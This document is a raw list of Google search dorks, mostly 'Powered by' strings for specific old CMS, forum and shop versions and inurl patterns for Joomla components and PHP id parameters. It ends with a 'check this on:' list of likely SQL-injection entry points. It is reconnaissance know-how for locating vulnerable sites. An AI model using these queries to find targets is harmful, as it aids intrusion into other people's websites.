"""POWERED BY LOG1 CMS"""
"""POWERED BY PHPNUKE.IR"""
"""POWERED BY ZIPBOX MEDIA"" inurl:""album.php"""
"""POWERED BY: WEBINSPIRE"""
"""Page created in"" ""seconds by glFusion"" +RSS"
"""ParsBlogger ? 2006. All rights reserved"""
"""Personal .NET Portal"""
"""PhpCollab . Log In"" | ""NetOffice . Log In"" | (intitle:""index.of."" intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)"
"""PhpLinkExchange v1.02"" "
"""Power by Blakord Portal"""
"""Power by:RichStrong CMS"""
"""PowerMovieList 0.14 Beta Copyright"""
"""Powerd by http://www.e-webtech.com"" "
"""Powerd by http://www.e-webtech.com"""
"""Powered *: newtelligence"" (""dasBlog 1.6""| ""dasBlog 1.5""| ""dasBlog 1.4""|""dasBlog 1.3"")"
"""Powered By 0DayDB v2.3"""
"""Powered By 4smart"" "
"""Powered By 4smart"""
"""Powered By : Yamamah Version 1.00"" "
"""Powered By AV Arcade"""
"""Powered By Aardvark Topsites PHP 4.2.2"""
"""Powered By AlstraSoft AskMe Pro"""
"""Powered By Aqua Cms"""
"""Powered By Basic CMS SweetRice"""
"""Powered By CMS-BRD"""
"""Powered By CrownWeb.net!"" inurl:""page.cfm"""
"""Powered By Dejcom Market CMS"""
"""Powered By Dew-NewPHPLinks v.2.1b"""
"""Powered By DynamicPAD"""
"""Powered By EgyPlus"""
"""Powered By Gravity Board X v2.0 BETA"""
"""Powered By HASHE"""
"""Powered By IP.Board 3.0.0 Beta 5"""
"""Powered By OpenCart"""
"""Powered By PageAdmin CMS Free Version"""
"""Powered By Pligg"" + ""Legal: License and Source"""
"""Powered By ScozNews"""
"""Powered By Steamcast ""0.9.75 beta"
"""Powered By The Black Lily 2007"""
"""Powered By W3infotech"""
"""Powered By Webcards"""
"""Powered By X7 Chat"""
"""Powered By Zoopeer"""
"""Powered By diskos"""
"""Powered By phpBB Garage 1.2.0"""
"""Powered By phpCOIN 1.2.2"""
"""Powered By phpCOIN v1.2.1"" / ""mod.php?mod=faq"" "
"""Powered By: lucidCMS 1.0.11"""
"""Powered by YDC"""
"""Powered by MetInfo 2.0"""
"""Powered by MetInfo 3.0"""
"""Powered by vlBook 1.21"""
"""Powered by http://www.aspportal.net"""
"""Powered by 68kb"" "
"""Powered by : elkagroup.com"" "
"""Powered by A-CART"""
"""Powered by AJ-Fork v.167"""
"""Powered by AMCMS3"""
"""Powered by Absolute File Send"""
"""Powered by Absolute Podcast"""
"""Powered by Active PHP Bookmarks v1.3"" inurl:.view_group.php?id= "
"""Powered by Ajax Portal 3.0"""
"""Powered by AlstraSoft SendIt Pro"""
"""Powered by Atomic Photo Album"" inurl:""photo.php?apa_album_ID="""
"""Powered by AzDg"" (2.1.3 | 2.1.2 | 2.1.1)"
"""Powered by BIGACE 2.4"""
"""Powered by BIGACE 2.5"""
"""Powered by BLOG:CMS""|""Powered by blogcms.com""|""2003-2004, Radek Hulán"""
"""Powered by Battle Blog"""
"""Powered by BosClassifieds Classified Ads System"""
"""Powered by Burning Board Lite 1.0.2 * 2001-2004"""
"""Powered by Burning Board Lite 1.0.2"" or ""Powered by Burning Board 2.3.6"""
"""Powered by Burning Board"" -exploit -johnny"
"""Powered by CCLeague Pro"""
"""Powered by CMS.GE"""
"""Powered by CMScout ©2005 CMScout Group"""
"""Powered by CMSimple"""
"""Powered by ClanAdmin Tools v1.4.2"""
"""Powered by ClanTiger"" "
"""Powered by ClanTiger"""
"""Powered by Claroline"" -demo"
"""Powered by Clicknet CMS"""
"""Powered by Clipshare"""
"""Powered by Comdev News Publisher"""
"""Powered by ComicShout"""
"""Powered by CommonSense CMS"" "
"""Powered by Content Injector v1.52"""
"""Powered by Content Injector v1.53"""
"""Powered by Coppermine Photo Gallery"" ( ""v1.2.2 b"" | ""v1.2.1"" | ""v1.2"" | ""v1.1"" | ""v1.0"")"
"""Powered by Coppermine Photo Gallery"""
"""Powered by CubeCart 3.0.4"" "
"""Powered by CubeCart"""
"""Powered by CuteNews"""
"""Powered by DCP-Portal v5.5"""
"""Powered by DMXReady Site Chassis Manager"" -site:dmxready.com"
"""Powered by DVHome.cn"""
"""Powered by DWdirectory"""
"""Powered by DZcms"""
"""Powered by Dayfox Designs"""
"""Powered by DesClub.com - phpLinkat"""
"""Powered by DigitalHive"""
"""Powered by Download 3000"""
"""Powered by Drake CMS"" inurl:index.php?option=guestbook"
"""Powered by Drumbeat"" inurl:index02.php "
"""Powered by ECShop v2.5.0"""
"""Powered by EPay Enterprise"" inurl:""shop.htm?cid="" | nurl:""shop.php?cid="""
"""Powered by EZCMS"""
"""Powered by Elgg, the leading open source social networking platform"""
"""Powered by Espinas IT"" "
"""Powered by ExBB """
"""Powered by F3Site"""
"""Powered by FUDForum 2.6"" -site:fudforum.org -johnny.ihackstuff"
"""Powered by FUDForum 2.7"" -site:fudforum.org -johnny.ihackstuff"
"""Powered by FUDforum"""
"""Powered by Fantastic News v2.1.2"" or ""Powered by Fantastic News v2.1.3"""
"""Powered by FlashGameScript"""
"""Powered by ForumApp"""
"""Powered by FreeWebshop"""
"""Powered by FreeWebshop.org 2.2.1"""
"""Powered by FubarForum v1.5"""
"""Powered by FubarForum v1.6"""
"""Powered by GGCMS"""
"""Powered by GTChat 0.95""+""User Login""+""Remember my login information"""
"""Powered by Gallery v1.4.4"""
"""Powered by GameSiteScript"""
"""Powered by GeN4"""
"""Powered by GetMyOwnArcade"""
"""Powered by Glossword 1.8.11"" OR ""Powered by Glossword 1.8.6"""
"""Powered by Gravy Media"""
"""Powered by Grayscale Blog"""
"""Powered by How2asp"""
"""Powered by IMGallery"""
"""Powered by INVOhost"""
"""Powered by IceWarp Software"" inurl:mail"
"""Powered by Ikonboard 3.1.1"""
"""Powered by Invision Power Board(U) v1.3 Final"""
"""Powered by KaiBB 1.0.1"""
"""Powered by Knowledge Base"""
"""Powered by LDU"""
"""Powered by Leap"""
"""Powered by LifeType"" ""RSS 0.90"" ""RSS 1.0"" ""RSS 2.0"" ""Valid XHTML 1.0 Strict and CSS"""
"""Powered by LightBlog"" - Powered by LightBlog"
"""Powered by LightNEasy"""
"""Powered by Locazolist Copyright © 2006"""
"""Powered by LoudBlog"""
"""Powered by Loudblog"""
"""Powered by MD-Pro"" | ""made with MD-Pro"""
"""Powered by MDForum"""
"""Powered by Maian Recipe v1.0"""
"""Powered by Md-Pro"""
"""Powered by Megabook *"" inurl:guestbook.cgi"
"""Powered by MercuryBoard [v1"""
"""Powered by MercuryBoard"""
"""Powered by Minerva"""
"""Powered by MobPartner"" inurl:""chat.php"""
"""Powered by My Blog"" intext:""FuzzyMonkey.org"""
"""Powered by My PHP Indexer 1.0"""
"""Powered by MySpace Content Zone"""
"""Powered by NovaBoard v1.0.0"""
"""Powered by NovaBoard v1.1.2"""
"""Powered by Nukedit"""
"""Powered by OnePound"""
"""Powered by Online Grades"""
"""Powered by Orca Interactive Forum Script"""
"""Powered by Ovidentia"""
"""Powered by PG Online Training Solution - learning management system"""
"""Powered by PG Real Estate Solution - real estate web site design"""
"""Powered by PG Roomate Finder Solution - roommate estate web site design"""
"""Powered by PHP Advanced Transfer Manager v1.30"""
"""Powered by PHP Director 0.2"""
"""Powered by PHP Director"""
"""Powered by PHP Live! v3.3"""
"""Powered by PHP Photo Album"""
"""Powered by PHP Shop from DeltaScripts"""
"""Powered by PHP iCalendar"""
"""Powered by PHP-Fusion v6.00.110"" | ""Powered by PHP-Fusion v6.00.2.."" | ""Powered by PHP-Fusion v6.00.3.."" -v6.00.400 -johnny.ihackstuff"
"""Powered by PHP-Update"" -site:www.php-update.co.uk"
"""Powered by PHPBasket"""
"""Powered by PHPizabi v0.848b C1 HFP1"""
"""Powered by PMOS Help Desk"""
"""Powered by PWP Version 1-5-1"" AND inurl:""/wiki/run.php"""
"""Powered by ParsBlogger"""
"""Powered by Philboard"" inurl:""philboard_forum.asp"""
"""Powered by Populum"" "
"""Powered by PowerPortal v1.3"""
"""Powered by ProjectCMS"""
"""Powered by PsNews"" "
"""Powered by PunBB"""
"""Powered by Quick.Cart"""
"""Powered by Quick.Cms"""
"""Powered by RGameScript"""
"""Powered by RW::Download v2.0.3 lite"""
"""Powered by Real Estate Portal"""
"""Powered by RealAdmin and Red Cow Technologies, Inc."" "
"""Powered by Reciprocal Links Manager"""
"""Powered by RedCat"" inurl:index.php?contentId= "
"""Powered by Rock Band CMS 0.10"" "
"""Powered by SLAED CMS"""
"""Powered by SMF"""
"""Powered by SOFTMAN"""
"""Powered by SOOP Portal Raven 1.0b"""
"""Powered by SazCart"""
"""Powered by Scallywag"" "
"""Powered by Scratcher"" "
"""Powered by Scripteen Free Image Hosting Script V 2.3"""
"""Powered by Scripteen Free Image Hosting Script V1.2"""
"""Powered by Seditio"""
"""Powered by Shadowed Portal"""
"""Powered by Shop-Script FREE"""
"""Powered by Shout!"""
"""Powered by Simple PHP Text newsletter"""
"""Powered by Simplog"""
"""Powered by SiteEngine"""
"""Powered by SiteX 0.7 Beta"" "
"""Powered by Smoothflash"""
"""Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"""
"""Powered by SoftbizScripts"" ""ALL JOBS"""
"""Powered by SoftbizScripts"" ""OUR SPONSORS"""
"""Powered by SoftbizScripts"" inurl:""searchresult.php?sbcat_id="""
"""Powered by SoftbizScripts"" inurl:store_info.php"
"""Powered by TS Special Edition"" "
"""Powered by TinyPHPForum v3.61"""
"""Powered by UCStats version 1.1"" "
"""Powered by UNAK-CMS"""
"""Powered by UNO.com.my"""
"""Powered by UPB"" (b 1.0)|(1.0 final)|(Public Beta 1.0b)"
"""Powered by UPB"""
"""Powered by VS PANEL 7.5.5"""
"""Powered by VS PANEL"""
"""Powered by Vsns Lemon"" intitle:""Vsns Lemon"""
"""Powered by WSN Guest"" "
"""Powered by WebStudio eCatalogue"""
"""Powered by WebStudio eHotel"""
"""Powered by WebText"""
"""Powered by Woltlab Burning Board"" -""2.3.3"" -""v2.3.3"" -""v2.3.2"" -""2.3.2"""
"""Powered by WordPress"" -html filetype:php -demo -wordpress.org -bugtraq"
"""Powered by WowBB"" -site:wowbb.com"
"""Powered by XHP CMS"" -ihackstuff -exploit -xhp.targetit.ro"
"""Powered by XMB"""
"""Powered by XOOPS 2.2.3 Final"""
"""Powered by Xaraya"" ""Copyright 2005"""
"""Powered by Xplode CMS"""
"""Powered by YaPig V0.92b"""
"""Powered by YourTube v1.0"""
"""Powered by ZeeMatri"""
"""Powered by Zomplog"""
"""Powered by Zorum 3.5"""
"""Powered by [ iSupport 1.8 ]"""
"""Powered by and copyright class-1"" 0.24.4"
"""Powered by autolinks pro 2.1"" inurl:register.php"
"""Powered by bSpeak 1.10"""
"""Powered by beamospetition 1.0.12"""
"""Powered by bp blog 6.0"""
"""Powered by cifshanghai.com"" "
"""Powered by cityadmin and Red Cow Technologies, Inc."""
"""Powered by cpCommerce"""
"""Powered by eXV2 Vers"""
"""Powered by ezContents Version 1.4.5"""
"""Powered by i-pos Storefront"""
"""Powered by iNetScripts"" "
"""Powered by iScripts SocialWare"""
"""Powered by ispCP Omega"" "
"""Powered by jSite 1.0 OE"""
"""Powered by mlffat"""
"""Powered by mnoGoSearch - free web search engine software"""
"""Powered by mojoPortal"" "
"""Powered by myBusinessAdmin and Red Cow Technologies, Inc."""
"""Powered by myUPB"" "
"""Powered by nzFotolog v0.4.1 © 2005-2006 Ricardo Amaral"" "
"""Powered by ocPortal"" -demo -ocportal.com"
"""Powered by osCMax v2.0"" , ""Copyright @"" ""RahnemaCo.com"" "
"""Powered by photokorn"""
"""Powered by phpCC Beta 4.2"""
"""Powered by phpMySport"""
"""Powered by sNews "" inurl:index.php?id= "
"""Powered by sNews"" "
"""Powered by samart-cms"""
"""Powered by sendcard - an advanced PHP e-card program"" -site:sendcard.org"
"""Powered by sendcard - an advanced PHP e-card program"""
"""Powered by visinia"""
"""Powered by web directory script"""
"""Powered by webSPELL"""
"""Powered by words tag script"""
"""Powered by wpQuiz"" inurl:index.php "
"""Powered by wpQuiz"""
"""Powered by xchangeboard"""
"""Powered by xeCMS"""
"""Powered by yacs"""
"""Powered by yappa-ng 2.3.1"" AND ""Powered by yappa-ng 2.3.1"""
"""Powered by yappa-ng"""
"""Powered by: Arab Portal v2"""
"""Powered by: Censura"""
"""Powered by: Elite Gaming Ladders v3.2"""
"""Powered by: IRIran.net"""
"""Powered by: Land Down Under 800"" | ""Powered by: Land Down Under 801"" - http://www.neocrome.net"
"""Powered by: MFH v1"""
"""Powered by: MyPHP Forum"""
"""Powered by: PHP Link Directory"""
"""Powered by: PhotoPost PHP 4.6"" or ""Powered by: PhotoPost PHP 4.5"""
"""Powered by: PhotoPost PHP 4.6.5"" "
"""Powered by: PostGuestbook 0.6.1"""
"""Powered by: PreProjects"""
"""Powered by: Southburn"""
"""Powered by: Yes Solutions"" "
"""Powered by: eSmile"""
"""Powered by: vBulletin * 3.0.1"" inurl:newreply.php"
"""Powie's PSCRIPT MatchMaker 4.05"""
"""REALTOR 747 - Version 4.11"""
"""RS MAXSOFT"""
"""Review Script"" ""Phil Taylor"""
"""Runcms Copyright"" ""2002 - 2007"" +""page created"""
"""S-CMS by matteoiamma"""
"""SOOP Portal 2.0"""
"""SQuery 4.5"" |""SQuery 4.0"" |""SQuery 3.9"" | inurl:""modules.php?name=SQuery"""
"""Scientific Image DataBase"""
"""Script réalisé par BinGo PHP"""
"""Search Adult Directory:"""
"""Search Affiliate Programs:"""
"""Search Projects"" intitle:""The ultimate project website"""
"""Search | Invite | Mail | Blog | Forum"""
"""Send amazing greetings to your friends and relative!"" "
"""Send amazing greetings to your friends and relative!"""
"""ShopMaker v1.0"""
"""Signkorn Guestbook 1.3"""
"""SimpleBlog 2.3 by 8pixel.net"""
"""Sinapis by scripter.ch"""
"""Site designed and built Powered by GlobalWebTek."""
"""Site designed and built by Powder Blue."" inurl:index.php?id_page="
"""Site designed and built by ProWeb Associates."""
"""Site powered By Limbo CMS"""
"""Site powered by GuppY"" | ""Site créé avec GuppY"" +inurl:lng="
"""Site powered by GuppY"""
"""Site produced by GeneralProducts.co.uk"""
"""Sitedesign by: Dieleman http://www.dieleman.nl - Copyright © 2010"" "
"""Siteman Version 1.1.9"""
"""SmodBIP"" & ""Aktualno.ci"""
"""SmodCMS"" & ""S.ownik"""
"""Software Categories"" ""Featured Resources"" ""Search"""
"""Software PBLang 4.66z"" AND ""Software PBLang 4.60"" OR ""Software PBLang"""
"""Software PBLang"" 4.65 filetype:php"
"""Splatt Forum©"""
"""SquirrelMail version 1.4.4"" inurl:src ext:php"
"""Starting bid"" ""Powered by SoftbizScripts"" "
"""TR Newsportal"" brought by TRanx."
"""TROforum 0.1"""
"""Tanyakan Pada Rumput Yang Bergoyang"" "
"""Tanyakan Pada Rumput Yang Bergoyang"""
"""Thank You for using WPCeasy"""
"""The Merchant Project"""
"""These forums are running on"" ""miniBB"""
"""This forum powered by Phorum."""
"""This is a Free & Open Source mailing list manager"""
"""This page has been automatically generated by Plesk Server Administrator"""
"""This script created by http://www.script.canavari.com"""
"""This script was created by Php-ZeroNet"" ""Script . Php-ZeroNet"""
"""This site is powered by CMS Made Simple version 1."""
"""This site is powered by CMS Made Simple version 1.2.2"""
"""This site is powered by CMS Made Simple"""
"""This site is powered by e107"""
"""This site is powered by e107""|inurl:e107_plugins|e107_handlers|e107_files"
"""This web site was made with MD-Pro"""
"""This web site was made with PostNuke"""
"""This website engine code is copyright"" ""2005 by Clever Copy"" -inurl:demo"
"""This website is powered by Mobius"""
"""This website is powered by Trio"""
"""This website powered by PHPX"" -demo"
"""This website was created with phpWebThings 1.4"""
"""This website was created with phpWebThings"""
"""TinyBB 2011 all rights reserved"""
"""Torbstoff News 4"""
"""Transloader by Somik.org"" OR ""Transloader by"" OR ""Transloder"""
"""Upload unique IP List:"" AND ""The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK"" "
"""Uploader by CeleronDude."" "
"""Vivid Ads Shopping Cart"""
"""Web Group Communication Center beta 0.5.6"" OR ""Web Group Communication Center beta 0.5.5"""
"""Web Group Communication Center"""
"""Web Site Design by Red Cat Studios"""
"""Web site engine's code is copyright © 2001-2007 ATutor®"""
"""WebCalendar v1.0.4"""
"""Webdesign Cosmos Solutions"""
"""Website Design by Rocktime"""
"""Website Powered By Creative SplashWorks - SplashSite"" "
"""Website by Spokane Web Communications"" "
"""Website by WebSolutions.ca"""
"""Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media"" "
"""Welcome to Exponent CMS"" | ""my new exponent site"" inurl:articlemodule "
"""Welcome to Exponent CMS"" | ""my new exponent site"""
"""Welcome to the versatileBulletinBoard"" | ""Powered by versatileBulletinBoard"""
"""X-CART. Powerful PHP shopping cart software"""
"""Yogurt build"""
"""You have not provided a survey identification num"
"""You have not provided a survey identification number"""
"""advanced_search_results.php?gender="""
"""and Powered By :Sansak"""
"""by Pivot - 1.40.5"" +'Dreadwind' -pivotlog.net"
"""by eXtreme Crew"""
"""by in-link"" or ""Powered by In-Link 2."""
"""cms SunLight 5.2"""
"""com_joom12pic"""
"""com_joomlaflashfun"""
"""com_lmo"""
"""copyright 2006 Broadband Mechanics"""
"""delete entries"" inurl:admin/delete.asp"
"""download this free gallery at matteobinda.com"""
"""driven by: ASP Message Board"""
"""eCommerce Engine © 2006 xt:Commerce Shopsoftware"" "
"""error_log"" inurl:/wp-content"
"""generated by Exhibit Engine 1.5 RC 4"""
"""hlstats.php?mode=dailyawardinfo&award="" hlstatsx "
"""inc_webblogmanager.asp"""
"""index of"" intext:fckeditor inurl:fckeditor"
"""index.php?id_menu="" CMScontrol "
"""index.php?option=com_chronoconnectivity"" / ""com_chronoconnectivity"
"""index.php?option=com_chronocontact"" / ""com_chronocontact"""
"""index.php?option=com_expose"" "
"""index.php?option=com_mdigg"""
"""index.php?option=com_news_portal"" or ""Powered by iJoomla News Portal"""
"""index.php?option=com_qcontacts"""
"""index.php?option=com_resman"""
"""index.php?option=com_rwcards"""
"""index.php?option=com_sef"" / ""com_sef"" "
"""index.php?option=com_seyret"" / ""com_seyret"""
"""index.php?sbjoke_id="""
"""index.php?section=post_upload"" "
"""intext:Warning: passthru()"" ""inurl:view=help"" "
"""inurl:/admin/"" ""ImageVue"" "
"""inurl:/site/articles.asp?idcategory="""
"""inurl:cultbooking.php"""
"""is a product of Lussumo"""
"""is proudly powered by WordPress"""
"""kims Q - Administrator Login Mode"""
"""made visual by sightFACTORY"""
"""mirco blogging"""
"""mumbo jumbo media"" + inurl:""index.php"""
"""nukeai beta3"""
"""pForum 1.29a"" OR """"Powie's PSCRIPT Forum 1.26"""
"""pForum 1.30"""
"""pages.php?page_ID="" ""K9 Kreativity"" "
"""php-addressbook"""
"""phpQuestionnaire v3"""
"""portailphp v1.3"" inurl:""index.php?affiche"" inurl:""PortailPHP"" -site:safari-msi.com"
"""powered by 4images"""
"""powered by AMCMS3"""
"""powered by Albinator"""
"""powered by AllMyGuests"""
"""powered by Blog System"" "
"""powered by Blue Dove Web Design"""
"""powered by CMS Made Simple version 1.1.2"""
"""powered by CubeCart 2.0"""
"""powered by CubeCart"" inurl:""index.php?_a="" "
"""powered by DBHcms"" "
"""powered by DreamAccount 3.1"""
"""powered by EQdkp"""
"""powered by ExtCalendar v2"""
"""powered by FlatPress"""
"""powered by Gallery v"" ""[slideshow]""|""images"" inurl:gallery"
"""powered by Gradman"""
"""powered by GuppY v4""|""Site créé avec GuppY v4"""
"""powered by ILIAS"""
"""powered by ITWorking"""
"""powered by JAMM"""
"""powered by LionWiki "" "
"""powered by MODx"""
"""powered by Nabernet"" "
"""powered by PCPIN.com"""
"""powered by Pagetool"""
"""powered by PassWiki"""
"""powered by Photo-Graffix Flash Image Gallery"""
"""powered by PhpBB 2.0.15"" -site:phpbb.com"
"""powered by Quick.Cart"""
"""powered by Sitellite"""
"""powered by Sniggabo CMS"" inurl:article.php?id"
"""powered by SnoGrafx"" "
"""powered by TSEP - The Search Engine Project"""
"""powered by ThWboard"""
"""powered by WonderEdit Pro"""
"""powered by XHP CMS"""
"""powered by active php bookmarks"" | inurl:bookmarks/view_group.php?id="
"""powered by aflog"""
"""powered by antiboard"""
"""powered by bitweaver"""
"""powered by blur6ex"""
"""powered by claroline"" -demo"
"""powered by clipshare"""
"""powered by dataface"" ""powered by xataface"" "
"""powered by devalcms v1.4.a"""
"""powered by discuz!"
"""powered by easytrade"""
"""powered by ezUserManager"""
"""powered by fuzzylime"" "
"""powered by gcards"""
"""powered by gelato cms"""
"""powered by guestbook script"" -ihackstuff -exploit"
"""powered by guestbook script"""
"""powered by jaws"" | ""powered by the jaws project"" | inurl:?gadget=search"
"""powered by jmdcms.com"""
"""powered by jshop"" "
"""powered by kure"""
"""powered by mcGalleryPRO"""
"""powered by minibb forum software"""
"""powered by minibb"" -site:www.minibb.net -intext:1.7f"
"""powered by php advanced transfer manager"""
"""powered by php icalendar"" -ihackstuff -exploit"
"""powered by php photo album"" -demo2 -pitanje"""
"""powered by php photo album"" | inurl:""main.php?cmd=album"" -demo2 -pitanje"
"""powered by php update"""
"""powered by phpAdBoard"""
"""powered by phpEmployment"""
"""powered by phpGreetCards"""
"""powered by phplist"" | inurl:""lists/?p=subscribe"" | inurl:""lists/index.php?p=subscribe"" -ubbi -bugs +phplist -tincan.co.uk"
"""powered by phpmydirectory"" OR intext:""2001-2006 phpMyDirectory.com"""
"""powered by pppblog v 0.3.(.)"""
"""powered by real-estate-website"""
"""powered by runcms"" -runcms.com -runcms.org"
"""powered by sX-Shop"" "
"""powered by sazcart"""
"""powered by sblog"" +""version 0.7"""
"""powered by seditio"" OR ""powered by ldu"""
"""powered by shutter v0.1.1"""
"""powered by simpleview CMS"""
"""powered by sphider"" -exploit -ihackstuff -www.cs.ioc.ee"
"""powered by sunshop"""
"""powered by tikiwiki"""
"""powered by twg"""
"""powered by ubbthreads"""
"""powered by vsp stats processor"""
"""powered by webClassifieds"""
"""powered by xmb"""
"""powered by yourtube"""
"""powered by zipbox media"""
"""powered by zomplog"""
"""powered by: WebLeague"" "
"""powered by: elkagroup"" "
"""powered by: profitCode"""
"""powergap"" or ""s04.php"" or s01.php or s02.php"
"""propulsé par JBlog"""
"""propulsé par DotClear"" ""fil atom"" ""fil rss"" +commentaires"
"""qjForum"""
"""realizacja eCreo.eu"""
"""running: Nucleus v3.1"" -.nucleuscms.org -demo"
"""script by RECIPE SCRIPT"""
"""site by Designscope"""
"""site powered by intuitive-websites.com"""
"""sitio web diseñado por http://www.toronja.com.pe"""
"""software 2004-2005 by randshop"""
"""this site is using the webspell script (version: 4.01.02)"""
"""toendaCMS is Free Software released under the GNU/GPL License."" | ""powered by toendaCMS"" -inurl:demo"
"""txx cms"""
"""visiteurs v2.0"""
"""wow roster version 1.*"""
"""wow roster version 1.5.*"""
"""© 2004 PHPKick.de Version 0.8"" "
"""© 2008 DevWorx - devworx.somee.com"" "
"""© 2009 Azimut Technologie"" "
"""© Sabdrimer CMS"""
"""© 2005-2006 Powered by eSyndiCat Link Exchange Script"""
"(""Skin Design by Amie of Intense"")|(""Fanfiction Categories"" ""Featured Stories"")|(""default2, 3column, Romance, eFiction"")"
"(""This Dragonflyâ„¢ installation was"" | ""Thanks for downloading Dragonfly"") -inurl:demo -inurl:cpgnuke.com"
"(""powered by nocc"" intitle:""NOCC Webmail"") -site:sourceforge.net -Zoekinalles.nl -analysis"
"(intitle:""Flyspray setup""|""powered by flyspray 0.9.7"") -flyspray.rocks.cc"
"(intitle:""metaframe XP Login"")|(intitle:""metaframe Presentation server Login"")"
"+""Powered by Invision Power Board v2.0.0..2"""
"+""Powered by phpBB 2.0.6..10"" -phpbb.com -phpbb.pl"
"+intext:""powered by MyBulletinBoard"""
"724CMS Powered, 724CMS Version 4.59. Enterprise "
"AlstraSoft Web ""ESE"""
"Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -""deadly eyes"""
"Copyright 2007, PHPAUCTION.NET"
"Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005"
"FhImage, powered by Flash-here.com"
"Nwahy.com 2.1 , inurl:'add-site.html'"
"Powered by ""vcart 3.3.2"""
"Powered by Ac4p.com Gallery v1.0 , Copyright© 2007 ac4p.com"
"Powered by Discuz! 1.0 © 2002, Crossday Studio of 11cn.org"
"Powered by Dodo, Bubo & Misty. Feed us!"
"This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004."
"This site is powered by e107, which is released under the terms of the GNU GPL License."
"[ Copyright 2005-2006 phpDirectorySourceâ„¢, all rights reserved ]"
"allintext: ""This site is powered by IndexScript"""
"allintext:"" If you would like to contact us, our email address is"" traffic"
"allintext:""Browse Blogs by Category"""
"allintext:""Browse our directory of our members top sites or create your own for free!"""
"allintext:""Home Member Search Chat Room Forum Help/Support privacy policy"""
"allintext:""Latest Pictures"" Name Gender Profile Rating"
"allintext:""Powered By Buddy Zone"""
"allintext:""Powered by: TotalCalendar"""
"allintext:""SuperCali Event Calendar"""
"allintitle: ""MCgallery 0.5b"""
"allinurl :""/modules/tutorials/"""
"allinurl :""modules/eblog"""
"allinurl :""modules/gallery"""
"allinurl :""modules/recipe"""
"allinurl :""wp-content/plugins/st_newsletter"""
"allinurl: ""/modules/myTopics/"""
"allinurl: ""com_actualite"""
"allinurl: ""com_alberghi"" detail"
"allinurl: ""com_estateagent"""
"allinurl: ""com_galeria"""
"allinurl: ""com_glossary"""
"allinurl: ""com_joovideo"" detail"
"allinurl: ""com_rapidrecipe""user_id"
"allinurl: ""index php p shop""categ"
"allinurl: ""index.php?area""galid"
"allinurl: ""index.php?mod=galerie""action=gal"
"allinurl: ""index.php?option=com_doc"""
"allinurl: ""index.php?p=gallerypic img_id"""
"allinurl: ""index.php?p=poll""showresult"
"allinurl: ""index.php?showlink""links"
"allinurl: ""modules MyAnnonces index php pa view"""
"allinurl: ""modules/dictionary"""
"allinurl: ""modules/dictionary/detail.php?id"" "
"allinurl: ""modules/eEmpregos/index.php"""
"allinurl: ""modules/glossaires"""
"allinurl: ""modules/wfdownloads/viewcat.php?cid"""
"allinurl: ""name Sections op viewarticle artid"""
"allinurl: ""pollBooth.php?op=results""pollID"
"allinurl: ""showCat.php?cat_id"""
"allinurl: ""wordspew-rss.php"""
"allinurl: aid ""com_xfaq"""
"allinurl: cid""modules/classifieds/index.php?pa=Adsview"""
"allinurl: com_gallery ""func"""
"allinurl: com_mcquiz ""tid"""
"allinurl: com_paxxgallery ""userid"" "
"allinurl: com_pcchess ""user_id"""
"allinurl: com_quiz""tid"""
"allinurl: galid ""index.php?p=gallerypic"""
"allinurl: id ""com_jooget"""
"allinurl: modules-php-op-modload ""req view_cat"""
"allinurl: page_id album ""photo"""
"allinurl:""/lildbi/"" "
"allinurl:""/questcms/"""
"allinurl:""/ubbthreads/"""
"allinurl:""article.download.php"""
"allinurl:""channel_detail.php?chid="""
"allinurl:""com_accombo"""
"allinurl:""com_ahsshop""do=default"
"allinurl:""com_candle"""
"allinurl:""com_cinema"""
"allinurl:""com_extcalendar"""
"allinurl:""com_garyscookbook"""
"allinurl:""com_n-gallery"""
"allinurl:""com_na_content"""
"allinurl:""com_neogallery"""
"allinurl:""com_restaurante"""
"allinurl:""com_simpleshop"""
"allinurl:""detResolucion.php?tipodoc_id="""
"allinurl:""index.php?mod=archives"""
"allinurl:""index.php?site="" ""W-Agora"""
"allinurl:""jokes.php?catagorie="""
"allinurl:""lyrics_menu/lyrics_song.php?l_id="""
"allinurl:""macgurublog.php?uid="""
"allinurl:""members.asp?action"""
"allinurl:""modules/photo/viewcat.php?id"""
"allinurl:""shop.htm?shopMGID="""
"allinurl:""verliadmin"""
"allinurl:""xGb.php"""
"allinurl:clientsignup.php ""classifieds"""
"allinurl:flashblog.html ""flashblog"""
"anyInventory, the most flexible and powerful web-based inventory system"
"ext:php intext:""Powered by phpNewMan Version"""
"ext:pl inurl:cgi intitle:""FormMail *"" -""*Referrer"" -""* Denied"" -sourceforge -error -cvs -input"
"filetype:asp inurl:""shopdisplayproducts.asp"""
"filetype:php intitle:""paNews v2.0b4"""
"filetype:php inurl:index.php inurl:""module=subjects"" inurl:""func=*"" (listpages| viewpage | listcat)"
"http://www.google.com/search?q=""Powered+by+XMB"""
"intext : ""Website by conceptinternetltd"""
"intext: ""Powered by Marinet"" "
"intext: ""Site developed & mantained by Woodall Creative Group"" "
"intext:"" Website Design and Hosting By Netricks, Inc."""
"intext:""2000-2001 The phpHeaven Team"" -sourceforge"
"intext:""2000-2001 The phpHeaven Team"""
"intext:""Calendar Program © Copyright 1999 Matt Kruse"" ""Add an event"""
"intext:""Design by BB Media.Org"" "
"intext:""Design by BB Media.Org"""
"intext:""Design by MMA Creative"" "
"intext:""Designed by Spaceacre"" "
"intext:""English for dummies"""
"intext:""Event List 0.8 Alpha by schlu.net """
"intext:""Free Ecommerce Shopping Cart Software by ViArt"" +""Your shopping cart is empty!"" + ""Products Search"" +""Advanced Search"" + ""All Categories"""
"intext:""Kalimat news system v 1.0"" "
"intext:""LinPHA Version"" intext:""Have fun"""
"intext:""Marketing Web Design - Posicionamiento en Buscadores"" "
"intext:""Parlic Design"" inurl:id "
"intext:""PhpGedView Version"" intext:""final - index"" -inurl:demo"
"intext:""Powered By : Yamamah Version 1.00"" "
"intext:""Powered By Azaronline.com"" "
"intext:""Powered By Geeklog"" -geeklog.net"
check this on:
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
